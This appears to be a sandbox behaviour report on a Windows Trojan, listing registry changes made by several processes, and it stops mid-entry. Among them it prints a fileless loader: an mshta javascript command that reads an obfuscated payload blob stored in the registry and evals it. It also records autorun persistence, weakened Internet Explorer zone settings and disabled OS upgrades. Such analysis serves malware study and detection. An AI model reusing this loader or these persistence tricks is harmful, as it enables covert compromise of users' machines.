[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL" = "02 AD DA EB C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Diagnostics, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "192"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "193"
"StoreChangeIDFor64BitProcesses" = "171"
"StoreChangeIDFor32BitProcesses" = "192"
The process PSCustomSetupUtil.exe:1288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "20 6F A9 B0 A7 AE 8D BE 65 6F 49 17 34 8D 94 59"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.WSMan.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "50 1F 2E EC C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "194"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "195"
"StoreChangeIDFor64BitProcesses" = "173"
"StoreChangeIDFor32BitProcesses" = "194"
The process PSCustomSetupUtil.exe:2756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF DE BD AC A3 7B C3 9F 08 23 B7 B3 CE 13 89 84"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "207"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "B6 52 D5 F1 C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "208"
"StoreChangeIDFor64BitProcesses" = "186"
"StoreChangeIDFor32BitProcesses" = "207"
The process PSCustomSetupUtil.exe:3964 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B F9 C7 AD D8 1B AF BD 93 88 BF 61 68 CB 6D 29"
[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL" = "B8 7B 06 EB C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "187"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "188"
"StoreChangeIDFor64BitProcesses" = "166"
"StoreChangeIDFor32BitProcesses" = "187"
The process PSCustomSetupUtil.exe:3988 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 89 13 3E 73 E2 8E 0C 07 8E 26 5D 35 1C F8 D8"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "188"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL" = "0C 66 31 EB C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "189"
"StoreChangeIDFor64BitProcesses" = "167"
"StoreChangeIDFor32BitProcesses" = "188"
The process PSCustomSetupUtil.exe:648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 68 5F 51 14 D9 51 96 3A 31 86 F4 E9 60 71 A9"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "1A E7 9A ED C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "203"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "204"
"StoreChangeIDFor64BitProcesses" = "182"
"StoreChangeIDFor32BitProcesses" = "203"
The process PSCustomSetupUtil.exe:2008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 39 2E 44 A3 6A 94 2D 7E 76 57 C6 5F 88 27 67"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "16 79 EA EC C7 D0 D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "198"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "199"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "177"
"StoreChangeIDFor32BitProcesses" = "198"
The process UUPPHBZOfNIWNOEBZBhdR.exe:1076 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 9E 37 10 C1 74 23 03 88 95 BF DE 91 27 AF A6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process regsvr32.exe:2024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D5 5F 76 7B 4B 13 49 BA 65 33 5E 09 DF 5D 2D 6E"
The process regsvr32.exe:2380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\342FCEDB45FFC2E0857]
"8BDCC7915048BC66" = "8BDCC7915048BC66"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"WindowsXP-KB968930-x86-ENG.exe" = "Self-Extracting Cabinet"
[HKLM\SOFTWARE\trss]
"slfdbbjs" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKLM\SOFTWARE\57A7188966691D52E6]
"55373F2BD9F90CD0E10" = "55373F2BD9F90CD0E10"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 8A 0A 92 65 29 55 49 EC E5 60 DB 6D 0D 46 8E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\trss]
"slfdbbjs" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies the IE Local Intranet zone settings so that all network paths (UNCs) are treated as Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies the IE Local Intranet zone settings so that all sites that bypass the proxy server are treated as Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies the IE Local Intranet zone settings so that all local (intranet) sites not listed in other zones are treated as Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\57A7188966691D52E6]
[HKLM\SOFTWARE\342FCEDB45FFC2E0857]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\342FCEDB45FFC2E0857]
"8BDCC7915048BC66"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoConfigURL"
[HKLM\SOFTWARE\57A7188966691D52E6]
"55373F2BD9F90CD0E10"
The process regsvr32.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 F2 71 BE 52 2D DF A2 16 99 96 E0 AF D4 CD 5A"
The process regsvr32.exe:324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\trss]
"uxjnqxthu" = "CB153804BB053A10"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"2300" = "0"
[HKCU\Software\trss]
"qcwxvpdn" = "1"
"kftbaigakf" = "1467068473"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\trss]
"tmmhg" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\trss]
"kftbaigakf" = "1467068473"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\trss]
"lbkg" = "CkfRswnkRLwfKcdQ8zjDJDq=FWpTjLsGn7KQi7eiWqjoqY6pYhWMDlpSTIuYtT;MFiWabOkc9RknuKjoQ=QfzT50g1se5gKdDEHBiQMHELsGYBqv3HxbcvOJZ9XmKN;q3zngxfCSKoNllrC8rz=f3CuLZpDTvD3ptMPVqTXR;Ojp4wlmWksCFsm9sZlOuZ=sJBjHT9V66LtZJsyDyX;rKAz2dVkfESbRWuahyohPamA4=h4pprvtE2qSzCD4v6AvdoChpF;R0a0U=2E3B050107352D73191936350D146024560B6459323730240778563A60203C14281B025911062E2634303C7246012B063908121C72390F0D2A1A112776780D5E257E3F210B1501292B3D57460D62101F3D78561B211F2832260E04421F18272E182C08627E1F59031C092A500F2504500C3A183E12201A5D6E684E1D51312A2F0700677131240E3E26041B183F3F1806002B250E58072D253F0E316D593A3F5B0121552879253F6E1F51491D030B047D22220C14262C163B2B085D747717031B0F21494D09735E333F073F7D430C0E05113015526F25040B3E2A302239713C60793E4A2F1D347B73060700505C321A26310E626030272E3B0328155C07150E280616250E581A02001C6C16464533300A3D69083D0A7A640F03290B0335322960260D0241170A1C36251D4252373C476E79011A5A663603005F02415119502D2903192A57463C0B66022E120B070F205D2F003506001223086525033F457D270A0A2E5A732D63320D3E163F1835323D2338391301"
[HKCU\Software\trss]
"zzpziqo" = "%Documents and Settings%\%current user%\Local Settings\Application Data\ohev\ohev.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\trss]
"lbkg" = "CkfRswnkRLwfKcdQ8zjDJDq=FWpTjLsGn7KQi7eiWqjoqY6pYhWMDlpSTIuYtT;MFiWabOkc9RknuKjoQ=QfzT50g1se5gKdDEHBiQMHELsGYBqv3HxbcvOJZ9XmKN;q3zngxfCSKoNllrC8rz=f3CuLZpDTvD3ptMPVqTXR;Ojp4wlmWksCFsm9sZlOuZ=sJBjHT9V66LtZJsyDyX;rKAz2dVkfESbRWuahyohPamA4=h4pprvtE2qSzCD4v6AvdoChpF;R0a0U=2E3B050107352D73191936350D146024560B6459323730240778563A60203C14281B025911062E2634303C7246012B063908121C72390F0D2A1A112776780D5E257E3F210B1501292B3D57460D62101F3D78561B211F2832260E04421F18272E182C08627E1F59031C092A500F2504500C3A183E12201A5D6E684E1D51312A2F0700677131240E3E26041B183F3F1806002B250E58072D253F0E316D593A3F5B0121552879253F6E1F51491D030B047D22220C14262C163B2B085D747717031B0F21494D09735E333F073F7D430C0E05113015526F25040B3E2A302239713C60793E4A2F1D347B73060700505C321A26310E626030272E3B0328155C07150E280616250E581A02001C6C16464533300A3D69083D0A7A640F03290B0335322960260D0241170A1C36251D4252373C476E79011A5A663603005F02415119502D2903192A57463C0B66022E120B070F205D2F003506001223086525033F457D270A0A2E5A732D63320D3E163F1835323D2338391301"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\trss]
"divhsrmodi" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Classes\ecb437\shell\open\command]
"(Default)" = "mshta javascript:E9uj6YSw=UqJyj5RF;t1F=new ActiveXObject(WScript.Shell);DQ6XcBejI1=hkHKd6G4;cBI9Z=t1F.RegRead(HKCU\\software\\trss\\lbkg);GBqq4HH=9nLHo8;eval(cBI9Z);EsCPMo71=2h;"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\trss]
"divhsrmodi" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1206" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1809" = "3"
[HKLM\SOFTWARE\trss]
"slfdbbjs" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKCU\Software\Classes\.48198b5]
"(Default)" = "ecb437"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
"DisableOSUpgrade" = "1"
[HKCU\Software\trss]
"uxjnqxthu" = "CB153804BB053A10"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 23 53 A4 EE 91 D0 B2 DD 99 E8 15 95 0A 5A 62"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"2300" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1206" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1809" = "3"
[HKLM\SOFTWARE\trss]
"zzpziqo" = "%Documents and Settings%\%current user%\Local Settings\Application Data\ohev\ohev.exe"
[HKCU\Software\trss]
"slfdbbjs" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\trss]
"tmmhg" = ""
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\OSUpgrade]
"ReservationsAllowed" = "0"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"
[HKLM\SOFTWARE\trss]
"qcwxvpdn" = "1"
[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"
To run automatically each time Windows boots, the Trojan adds the following value pointing to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\ohev\ohev.exec"
The Trojan modifies the IE Local Intranet zone settings so that all network paths (UNCs) are treated as Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies the IE Local Intranet zone settings so that all local (intranet) sites not listed in other zones are treated as Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies the IE Local Intranet zone settings so that all sites that bypass the proxy server are treated as Intranet Zone:
"ProxyBypass" = "1"
To run automatically each time Windows boots, the Trojan adds the following value pointing to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\ohev\ohev.exe"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
